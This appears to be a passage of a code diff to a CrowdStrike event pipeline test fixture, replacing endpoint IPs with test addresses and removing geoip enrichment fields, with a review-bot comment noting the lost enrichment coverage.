"action": "SystemCapacity", 
@@ -6396,24 +5624,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-MD", - "city_name": "Hagerstown", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Maryland", - "location": { - "lon": -77.7337, - "lat": 39.6343 - } - }, - "address": "208.71.69.91", - "vendor": "crowdstrike", - "ip": "208.71.69.91", "serial_number": "ffffffff0d7b4d839912e55b4755e85b", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:02:48.429Z", "os": { 
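Review bot: The new side of this hunk drops the whole `observer.geo` object and adds nothing in its place, so after this change the fixture no longer asserts any geoip enrichment for `observer.ip`; the same happens for `observer.geo` in the hunk above (-6322) and for `source.geo` and `source.as` in the -6473 hunk below, and in every later observer block in this file. Presumably the test GeoIP database used by the pipeline test has no record for 67.43.156.13/14, but the diff itself does not show that, and an expected file that silently loses enrichment fields also passes when the geoip processor stops running. Worth confirming that the omission is intended and, if enrichment should stay covered, keeping at least one event whose address the test database resolves so `observer.geo`/`source.as` remain under test. The enclosing event objects start and end outside this hunk.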
@@ -6424,18 +5640,18 @@ }, "related": { "hosts": [ - "208.71.69.91" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.71.69.91" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465934800Z", - "original": "{\"event_simpleName\":\"FirmwareAnalysisStatus\",\"ConfigStateHash\":\"3090255842\",\"FirmwareAnalysisEclControlInterfaceVersion\":\"0\",\"aip\":\"208.71.69.91\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"FirmwareAnalysisEclConsumerInterfaceVersion\":\"0\",\"BootTimeFunctionalityLevel\":\"255\",\"ReasonOfFunctionalityLevel\":\"3\",\"CurrentFunctionalityLevel\":\"2\",\"Entitlements\":\"15\",\"name\":\"FirmwareAnalysisStatusMacV2\",\"id\":\"ffffffff-1111-11eb-ba57-0214a0d89bf7\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffff0d7b4d839912e55b4755e85b\",\"timestamp\":\"1625677368429\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"PciAttachmentState\":\"65535\"}", + "ingested": "2021-12-09T13:36:11.151048300Z", + "original": "{\"event_simpleName\":\"FirmwareAnalysisStatus\",\"ConfigStateHash\":\"3090255842\",\"FirmwareAnalysisEclControlInterfaceVersion\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"FirmwareAnalysisEclConsumerInterfaceVersion\":\"0\",\"BootTimeFunctionalityLevel\":\"255\",\"ReasonOfFunctionalityLevel\":\"3\",\"CurrentFunctionalityLevel\":\"2\",\"Entitlements\":\"15\",\"name\":\"FirmwareAnalysisStatusMacV2\",\"id\":\"ffffffff-1111-11eb-ba57-0214a0d89bf7\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffff0d7b4d839912e55b4755e85b\",\"timestamp\":\"1625677368429\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"PciAttachmentState\":\"65535\"}", "created": "2021-07-07T17:02:48.429Z", "kind": "state", "action": "FirmwareAnalysisStatus", 
@@ -6473,26 +5689,8 @@ "type": "macos" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-OK", - "city_name": "Tulsa", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Oklahoma", - "location": { - "lon": -95.9306, - "lat": 36.0284 - } - }, - "as": { - "number": 1239, - "organization": { - "name": "Sprint" - } - }, - "address": "208.27.234.231", - "ip": "208.27.234.231" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "url": { "scheme": "http" @@ -6501,21 +5699,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.160.204.13", - "vendor": "crowdstrike", - "ip": "208.160.204.13", "serial_number": "ffffffff557f4b99a0afdea9ce8cd6fa", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T17:05:04.544Z", "ecs": { 
@@ -6523,20 +5712,20 @@ }, "related": { "hosts": [ - "208.160.204.13", - "208.27.234.231" + "67.43.156.13", + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.160.204.13", - "208.27.234.231" + "67.43.156.13", + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465941600Z", - "original": "{\"OutOctets\":\"0\",\"CreationTimeStamp\":\"\",\"aip\":\"208.160.204.13\",\"OutMulticastPkts\":\"0\",\"InErrors\":\"0\",\"InterfaceAlias\":\"utun2\",\"InDiscards\":\"0\",\"InterfaceIndex\":\"17\",\"event_platform\":\"Mac\",\"InterfaceType\":\"1\",\"id\":\"ffffffff-1111-11eb-a272-0294ad12fbe7\",\"PhysicalAddressLength\":\"0\",\"InUcastPkts\":\"0\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677504544\",\"LocalAddressIP4\":\"208.27.234.231\",\"event_simpleName\":\"LocalIpAddressIP4\",\"ConfigStateHash\":\"3090255842\",\"PhysicalAddress\":\"\",\"OutErrors\":\"0\",\"InUnknownProtos\":\"0\",\"OutUcastPkts\":\"0\",\"InMulticastPkts\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"InOctets\":\"0\",\"NetLuidIndex\":\"2\",\"Entitlements\":\"15\",\"name\":\"LocalIpAddressIP4MacV1\",\"aid\":\"ffffffff557f4b99a0afdea9ce8cd6fa\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.151054800Z", + "original": 
"{\"OutOctets\":\"0\",\"CreationTimeStamp\":\"\",\"aip\":\"67.43.156.13\",\"OutMulticastPkts\":\"0\",\"InErrors\":\"0\",\"InterfaceAlias\":\"utun2\",\"InDiscards\":\"0\",\"InterfaceIndex\":\"17\",\"event_platform\":\"Mac\",\"InterfaceType\":\"1\",\"id\":\"ffffffff-1111-11eb-a272-0294ad12fbe7\",\"PhysicalAddressLength\":\"0\",\"InUcastPkts\":\"0\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677504544\",\"LocalAddressIP4\":\"67.43.156.14\",\"event_simpleName\":\"LocalIpAddressIP4\",\"ConfigStateHash\":\"3090255842\",\"PhysicalAddress\":\"\",\"OutErrors\":\"0\",\"InUnknownProtos\":\"0\",\"OutUcastPkts\":\"0\",\"InMulticastPkts\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"InOctets\":\"0\",\"NetLuidIndex\":\"2\",\"Entitlements\":\"15\",\"name\":\"LocalIpAddressIP4MacV1\",\"aid\":\"ffffffff557f4b99a0afdea9ce8cd6fa\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:04.544Z", "kind": "state", "action": "LocalIpAddressIP4", @@ -6606,21 +5795,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.134.209", - "vendor": "crowdstrike", - "ip": "208.216.134.209", "serial_number": "ffffffff70d140ca9ba97f0dddd14137", + "address": "67.43.156.13", "type": "agent", - "version": "1007.8.0009806.1" + "version": "1007.8.0009806.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:04:59.681Z", "ecs": { @@ -6628,7 +5808,7 @@ }, "related": { "hosts": [ - "208.216.134.209" + "67.43.156.13" ], "hash": [ "894356eb59e279696c304f07091b7fde", 
@@ -6636,12 +5816,12 @@ "4288861242" ], "ip": [ - "208.216.134.209" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465948300Z", - "original": "{\"CommandLine\":\"uname -a\",\"ConfigBuild\":\"1007.8.0009806.1\",\"ConfigStateHash\":\"4288861242\",\"Entitlements\":\"15\",\"GID\":\"0\",\"ImageFileName\":\"/bin/uname\",\"MD5HashData\":\"894356eb59e279696c304f07091b7fde\",\"NDRoot\":\"321385814512398584\",\"ParentProcessId\":\"321385814512398584\",\"ProcessEndTime\":\"1604855099.126\",\"ProcessGroupId\":\"0\",\"ProcessStartTime\":\"1604855099.126\",\"RGID\":\"0\",\"RUID\":\"0\",\"RawProcessId\":\"51342\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"de80fe0bd06a96543aaec5c634b08cbfc58dba88ea3a66871434a0dd3a9e9dfa\",\"SVGID\":\"0\",\"SVUID\":\"0\",\"SessionProcessId\":\"314116638974342642\",\"SourceProcessId\":\"321385814512398584\",\"SourceThreadId\":\"0\",\"TargetProcessId\":\"321385814512398605\",\"UID\":\"0\",\"aid\":\"ffffffff70d140ca9ba97f0dddd14137\",\"aip\":\"208.216.134.209\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Lin\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-ac87-06decddc17a1\",\"name\":\"ProcessRollup2LinV5\",\"timestamp\":\"1604855099681\"}", + "ingested": "2021-12-09T13:36:11.151061100Z", + "original": "{\"CommandLine\":\"uname 
-a\",\"ConfigBuild\":\"1007.8.0009806.1\",\"ConfigStateHash\":\"4288861242\",\"Entitlements\":\"15\",\"GID\":\"0\",\"ImageFileName\":\"/bin/uname\",\"MD5HashData\":\"894356eb59e279696c304f07091b7fde\",\"NDRoot\":\"321385814512398584\",\"ParentProcessId\":\"321385814512398584\",\"ProcessEndTime\":\"1604855099.126\",\"ProcessGroupId\":\"0\",\"ProcessStartTime\":\"1604855099.126\",\"RGID\":\"0\",\"RUID\":\"0\",\"RawProcessId\":\"51342\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"de80fe0bd06a96543aaec5c634b08cbfc58dba88ea3a66871434a0dd3a9e9dfa\",\"SVGID\":\"0\",\"SVUID\":\"0\",\"SessionProcessId\":\"314116638974342642\",\"SourceProcessId\":\"321385814512398584\",\"SourceThreadId\":\"0\",\"TargetProcessId\":\"321385814512398605\",\"UID\":\"0\",\"aid\":\"ffffffff70d140ca9ba97f0dddd14137\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Lin\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-ac87-06decddc17a1\",\"name\":\"ProcessRollup2LinV5\",\"timestamp\":\"1604855099681\"}", "created": "2020-11-08T17:04:59.681Z", "kind": "event", "action": "ProcessRollup2", @@ -6696,21 +5876,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.3.106.158", - "vendor": "crowdstrike", - "ip": "208.3.106.158", "serial_number": "ffffffff75fc48f15cfe5f095e605c4c", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0011104.1" + "version": "1007.4.0011104.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:04:56.730Z", "ecs": { 
@@ -6718,19 +5889,19 @@ }, "related": { "hosts": [ - "208.3.106.158" + "67.43.156.14" ], "hash": [ "6de76ab470a16b2a825d223b996d994623473c694c60fccbb71af8691e61c5e0", "1789338890" ], "ip": [ - "208.3.106.158" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465954900Z", - "original": "{\"AsepWrittenCount\":\"0\",\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1789338890\",\"ContextProcessId\":\"317713210176499254\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604855096.730\",\"DirectoryCreatedCount\":\"0\",\"DnsRequestCount\":\"0\",\"Entitlements\":\"15\",\"ExecutableDeletedCount\":\"0\",\"FileDeletedCount\":\"0\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"RawProcessId\":\"28987\",\"SHA256HashData\":\"6de76ab470a16b2a825d223b996d994623473c694c60fccbb71af8691e61c5e0\",\"SuspectStackCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"TargetProcessId\":\"317713210176499254\",\"aid\":\"ffffffff75fc48f15cfe5f095e605c4c\",\"aip\":\"208.3.106.158\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-809e-02fff4e55a49\",\"name\":\"EndOfProcessMacV14\",\"timestamp\":\"1604855099646\"}", + "ingested": "2021-12-09T13:36:11.151067300Z", + "original": 
"{\"AsepWrittenCount\":\"0\",\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1789338890\",\"ContextProcessId\":\"317713210176499254\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604855096.730\",\"DirectoryCreatedCount\":\"0\",\"DnsRequestCount\":\"0\",\"Entitlements\":\"15\",\"ExecutableDeletedCount\":\"0\",\"FileDeletedCount\":\"0\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"RawProcessId\":\"28987\",\"SHA256HashData\":\"6de76ab470a16b2a825d223b996d994623473c694c60fccbb71af8691e61c5e0\",\"SuspectStackCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"TargetProcessId\":\"317713210176499254\",\"aid\":\"ffffffff75fc48f15cfe5f095e605c4c\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-809e-02fff4e55a49\",\"name\":\"EndOfProcessMacV14\",\"timestamp\":\"1604855099646\"}", "created": "2020-11-08T17:04:59.646Z", "kind": "event", "action": "EndOfProcess", @@ -6791,21 +5962,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "South America", - "country_name": "Colombia", - "location": { - "lon": -74.0758, - "lat": 4.5981 - }, - "country_iso_code": "CO" - }, - "address": "208.9.60.157", - "vendor": "crowdstrike", - "ip": "208.9.60.157", "serial_number": "ffffffffb5db4b2e7ec89aba537adcc2", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:04:57.926Z", "ecs": { 
@@ -6813,19 +5975,19 @@ }, "related": { "hosts": [ - "208.9.60.157" + "67.43.156.14" ], "hash": [ "faceb6f5d1cdc5ad50a4a1b92c4cd3fcdabcf7e8d418014a1b1221c1defa3d8f", "3343111420" ], "ip": [ - "208.9.60.157" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465961700Z", - "original": "{\"AllocateVirtualMemoryCount\":\"0\",\"ArchiveFileWrittenCount\":\"0\",\"AsepWrittenCount\":\"0\",\"BinaryExecutableWrittenCount\":\"0\",\"CLICreationCount\":\"0\",\"ConHostId\":\"38188\",\"ConHostProcessId\":\"3099352216141\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3343111420\",\"ContextData\":\"\",\"ContextProcessId\":\"3100508103359\",\"ContextThreadId\":\"93436292950223\",\"ContextTimeStamp\":\"1604855097.926\",\"CreateProcessCount\":\"0\",\"CycleTime\":\"2937514388\",\"DirectoryCreatedCount\":\"0\",\"DirectoryEnumeratedCount\":\"1\",\"DnsRequestCount\":\"0\",\"DocumentFileWrittenCount\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ExeAndServiceCount\":\"0\",\"ExecutableDeletedCount\":\"0\",\"ExitCode\":\"0\",\"FileDeletedCount\":\"2\",\"GenericFileWrittenCount\":\"0\",\"ImageSubsystem\":\"3\",\"InjectedDllCount\":\"0\",\"InjectedThreadCount\":\"0\",\"KernelTime\":\"7500000\",\"MaxThreadCount\":\"4\",\"ModuleLoadCount\":\"38\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkConnectCountUdp\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkModuleLoadCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"ParentProcessId\":\"3099350649383\",\"PrivilegedProcessHandleCount\":\"0\",\"ProcessStartTime\":\"1604855096.463\",\"ProtectVirtualMemoryCount\":\"0\",\"QueueApcCount\":\"0\",\"RawProcessId\":\"33016\",\"RegKeySecurityDecreasedCount\":\"0\",\"RemovableDiskFileWrittenCount\":\"0\",\"RunDllInvocationCount\":\"0\",\"SHA256HashData\":\"faceb6f5d1cdc5ad50a4a1b92c4cd3fcdabcf7e8d418014a1b1221c1defa3d8f\",\"ScreenshotsTake
nCount\":\"0\",\"ScriptEngineInvocationCount\":\"0\",\"ServiceEventCount\":\"0\",\"SetThreadContextCount\":\"0\",\"SnapshotFileOpenCount\":\"0\",\"SuspectStackCount\":\"0\",\"SuspiciousCredentialModuleLoadCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"SuspiciousFontLoadCount\":\"0\",\"SuspiciousRawDiskReadCount\":\"0\",\"TargetProcessId\":\"3100508103359\",\"UnsignedModuleLoadCount\":\"0\",\"UserMemoryAllocateExecutableCount\":\"0\",\"UserMemoryAllocateExecutableRemoteCount\":\"0\",\"UserMemoryProtectExecutableCount\":\"0\",\"UserMemoryProtectExecutableRemoteCount\":\"0\",\"UserSid\":\"S-1-5-18\",\"UserTime\":\"6406250\",\"aid\":\"ffffffffb5db4b2e7ec89aba537adcc2\",\"aip\":\"208.9.60.157\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-8726-063418e4a9e7\",\"name\":\"EndOfProcessV15\",\"timestamp\":\"1604855099935\"}", + "ingested": "2021-12-09T13:36:11.151073500Z", + "original": "{\"AllocateVirtualMemoryCount\":\"0\",\"ArchiveFileWrittenCount\":\"0\",\"AsepWrittenCount\":\"0\",\"BinaryExecutableWrittenCount\":\"0\",\"CLICreationCount\":\"0\",\"ConHostId\":\"38188\",\"ConHostProcessId\":\"3099352216141\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3343111420\",\"ContextData\":\"\",\"ContextProcessId\":\"3100508103359\",\"ContextThreadId\":\"93436292950223\",\"ContextTimeStamp\":\"1604855097.926\",\"CreateProcessCount\":\"0\",\"CycleTime\":\"2937514388\",\"DirectoryCreatedCount\":\"0\",\"DirectoryEnumeratedCount\":\"1\",\"DnsRequestCount\":\"0\",\"DocumentFileWrittenCount\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ExeAndServiceCount\":\"0\",\"ExecutableDeletedCount\":\"0\",\"ExitCode\":\"0\",\"FileDeletedCount\":\"2\",\"GenericFileWrittenCount\":\"0\",\"ImageSubsystem\":\"3\",\"InjectedDllCount\":\"0\",\"InjectedThreadCount\":\"0\",\"KernelTime\":\"7500000\",\"MaxThreadCount\":\"4\",\"ModuleLoadCount\":\"38\",\"NetworkBindCount\":\
"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkConnectCountUdp\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkModuleLoadCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"ParentProcessId\":\"3099350649383\",\"PrivilegedProcessHandleCount\":\"0\",\"ProcessStartTime\":\"1604855096.463\",\"ProtectVirtualMemoryCount\":\"0\",\"QueueApcCount\":\"0\",\"RawProcessId\":\"33016\",\"RegKeySecurityDecreasedCount\":\"0\",\"RemovableDiskFileWrittenCount\":\"0\",\"RunDllInvocationCount\":\"0\",\"SHA256HashData\":\"faceb6f5d1cdc5ad50a4a1b92c4cd3fcdabcf7e8d418014a1b1221c1defa3d8f\",\"ScreenshotsTakenCount\":\"0\",\"ScriptEngineInvocationCount\":\"0\",\"ServiceEventCount\":\"0\",\"SetThreadContextCount\":\"0\",\"SnapshotFileOpenCount\":\"0\",\"SuspectStackCount\":\"0\",\"SuspiciousCredentialModuleLoadCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"SuspiciousFontLoadCount\":\"0\",\"SuspiciousRawDiskReadCount\":\"0\",\"TargetProcessId\":\"3100508103359\",\"UnsignedModuleLoadCount\":\"0\",\"UserMemoryAllocateExecutableCount\":\"0\",\"UserMemoryAllocateExecutableRemoteCount\":\"0\",\"UserMemoryProtectExecutableCount\":\"0\",\"UserMemoryProtectExecutableRemoteCount\":\"0\",\"UserSid\":\"S-1-5-18\",\"UserTime\":\"6406250\",\"aid\":\"ffffffffb5db4b2e7ec89aba537adcc2\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-8726-063418e4a9e7\",\"name\":\"EndOfProcessV15\",\"timestamp\":\"1604855099935\"}", "created": "2020-11-08T17:04:59.935Z", "kind": "event", "action": "EndOfProcess", 
@@ -6925,21 +6087,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.14.207.30", - "vendor": "crowdstrike", - "ip": "208.14.207.30", "serial_number": "ffffffff1aa0482a5ea94f64e08e7b15", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0009304.1" + "version": "1007.4.0009304.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:05:01.341Z", "ecs": { 
@@ -6947,19 +6100,19 @@ }, "related": { "hosts": [ - "208.14.207.30" + "67.43.156.14" ], "hash": [ "3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3", "3344040805" ], "ip": [ - "208.14.207.30" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465968400Z", - "original": "{\"AsepWrittenCount\":\"0\",\"ConfigBuild\":\"1007.4.0009304.1\",\"ConfigStateHash\":\"3344040805\",\"ContextProcessId\":\"311775981885093125\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604855101.341\",\"DirectoryCreatedCount\":\"0\",\"DnsRequestCount\":\"0\",\"Entitlements\":\"15\",\"ExecutableDeletedCount\":\"0\",\"FileDeletedCount\":\"0\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"RawProcessId\":\"10507\",\"SHA256HashData\":\"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3\",\"SuspectStackCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"TargetProcessId\":\"311775981885093125\",\"aid\":\"ffffffff1aa0482a5ea94f64e08e7b15\",\"aip\":\"208.14.207.30\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-bc03-065126dd0691\",\"name\":\"EndOfProcessMacV12\",\"timestamp\":\"1604855100139\"}", + "ingested": "2021-12-09T13:36:11.151079900Z", + "original": 
"{\"AsepWrittenCount\":\"0\",\"ConfigBuild\":\"1007.4.0009304.1\",\"ConfigStateHash\":\"3344040805\",\"ContextProcessId\":\"311775981885093125\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604855101.341\",\"DirectoryCreatedCount\":\"0\",\"DnsRequestCount\":\"0\",\"Entitlements\":\"15\",\"ExecutableDeletedCount\":\"0\",\"FileDeletedCount\":\"0\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"RawProcessId\":\"10507\",\"SHA256HashData\":\"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3\",\"SuspectStackCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"TargetProcessId\":\"311775981885093125\",\"aid\":\"ffffffff1aa0482a5ea94f64e08e7b15\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-bc03-065126dd0691\",\"name\":\"EndOfProcessMacV12\",\"timestamp\":\"1604855100139\"}", "created": "2020-11-08T17:05:00.139Z", "kind": "event", "action": "EndOfProcess", @@ -7025,21 +6178,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.142.127", - "vendor": "crowdstrike", - "ip": "208.216.142.127", "serial_number": "ffffffff3a5a424fa02450da53619745", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:05:00.030Z", "ecs": { @@ -7047,7 +6191,7 @@ }, "related": { "hosts": [ - "208.216.142.127" + "67.43.156.13" ], "hash": [ "571391f723a439e985a2064337e2802a", 
@@ -7055,12 +6199,12 @@ "3765958535" ], "ip": [ - "208.216.142.127" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465975100Z", - "original": "{\"AuthenticationId\":\"999\",\"CommandLine\":\"D:\\\\projects\\\\splunk-forwarder\\\\bin\\\\splunk-powershell.exe --ps2\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3765958535\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume2\\\\projects\\\\splunk-forwarder\\\\bin\\\\splunk-powershell.exe\",\"ImageSubsystem\":\"3\",\"IntegrityLevel\":\"16384\",\"MD5HashData\":\"571391f723a439e985a2064337e2802a\",\"ParentAuthenticationId\":\"999\",\"ParentBaseFileName\":\"splunkd.exe\",\"ParentProcessId\":\"17346335177\",\"ProcessCreateFlags\":\"67634688\",\"ProcessEndTime\":\"\",\"ProcessParameterFlags\":\"24577\",\"ProcessStartTime\":\"1604855099.406\",\"ProcessSxsFlags\":\"64\",\"RawProcessId\":\"6116\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"7f326aad0ee45bfef93daede5597d70422d472084ae3295762654fb5021a8720\",\"SessionId\":\"0\",\"SourceProcessId\":\"17346335177\",\"SourceThreadId\":\"107650023406\",\"Tags\":\"27, 151, 12094627905582, 12094627906234\",\"TargetProcessId\":\"583707537390\",\"TokenType\":\"1\",\"UserSid\":\"S-1-5-18\",\"WindowFlags\":\"384\",\"aid\":\"ffffffff3a5a424fa02450da53619745\",\"aip\":\"208.216.142.127\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-a09e-06f79d630255\",\"name\":\"ProcessRollup2V17\",\"timestamp\":\"1604855100030\"}", + "ingested": "2021-12-09T13:36:11.151086200Z", + "original": "{\"AuthenticationId\":\"999\",\"CommandLine\":\"D:\\\\projects\\\\splunk-forwarder\\\\bin\\\\splunk-powershell.exe 
--ps2\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3765958535\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume2\\\\projects\\\\splunk-forwarder\\\\bin\\\\splunk-powershell.exe\",\"ImageSubsystem\":\"3\",\"IntegrityLevel\":\"16384\",\"MD5HashData\":\"571391f723a439e985a2064337e2802a\",\"ParentAuthenticationId\":\"999\",\"ParentBaseFileName\":\"splunkd.exe\",\"ParentProcessId\":\"17346335177\",\"ProcessCreateFlags\":\"67634688\",\"ProcessEndTime\":\"\",\"ProcessParameterFlags\":\"24577\",\"ProcessStartTime\":\"1604855099.406\",\"ProcessSxsFlags\":\"64\",\"RawProcessId\":\"6116\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"7f326aad0ee45bfef93daede5597d70422d472084ae3295762654fb5021a8720\",\"SessionId\":\"0\",\"SourceProcessId\":\"17346335177\",\"SourceThreadId\":\"107650023406\",\"Tags\":\